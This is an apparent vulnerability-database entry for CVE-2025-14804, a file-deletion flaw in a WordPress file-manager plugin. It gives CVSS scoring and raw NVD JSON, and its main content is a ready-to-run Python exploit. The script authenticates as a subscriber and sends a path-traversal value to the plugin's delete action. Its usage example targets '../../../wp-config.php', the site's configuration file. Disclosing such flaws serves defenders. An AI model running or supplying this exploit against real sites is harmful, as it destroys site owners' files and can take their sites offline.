Security Vulnerability Report
中文
CVE-2025-14804 CVSS 7.7 HIGH

CVE-2025-14804

Published: 2026-01-07 12:16:57
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Frontend File Manager Plugin WordPress plugin before 23.5 did not validate a path parameter and ownership of the file, allowing any authenticated users, such as subscribers to delete arbitrary files on the server

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Frontend File Manager Plugin < 23.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from urllib.parse import quote # CVE-2025-14804 PoC - Arbitrary File Deletion in Frontend File Manager Plugin # Requires authenticated user (subscriber role or higher) TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker" PASSWORD = "password" def get_auth_cookie(): """Authenticate and get WordPress session cookie""" login_url = f"{TARGET_URL}/wp-login.php" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data, allow_redirects=False) if 'wordpress_logged_in' in str(session.cookies) or response.status_code == 302: return session.cookies return None def delete_arbitrary_file(cookies, file_path): """Send file deletion request with path traversal payload""" delete_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Path traversal payload to delete arbitrary file payload = { 'action': 'fmfm_delete_file', 'path': file_path } headers = { 'X-Requested-With': 'XMLHttpRequest' } response = requests.post(delete_url, data=payload, cookies=cookies, headers=headers) return response def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-14804-poc.py <file_to_delete>") print("Example: python cve-2025-14804-poc.py ../../../wp-config.php") sys.exit(1) target_file = sys.argv[1] print(f"[*] Authenticating as {USERNAME}...") cookies = get_auth_cookie() if not cookies: print("[-] Authentication failed!") sys.exit(1) print("[+] Authentication successful!") print(f"[*] Attempting to delete: {target_file}") response = delete_arbitrary_file(cookies, target_file) if response.status_code == 200: print("[+] File deletion request sent successfully") print(f"[*] Response: {response.text}") else: print(f"[-] Request failed with status code: {response.status_code}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14804", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:56.620", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Frontend File Manager Plugin WordPress plugin before 23.5 did not validate a path parameter and ownership of the file, allowing any authenticated users, such as subscribers to delete arbitrary files on the server"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "references": [{"url": "https://wpscan.com/vulnerability/c572c0ad-1b36-49ce-b254-2181e53abb46/", "source": "[email protected]"}, {"url": "https://wpscan.com/vulnerability/c572c0ad-1b36-49ce-b254-2181e53abb46/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.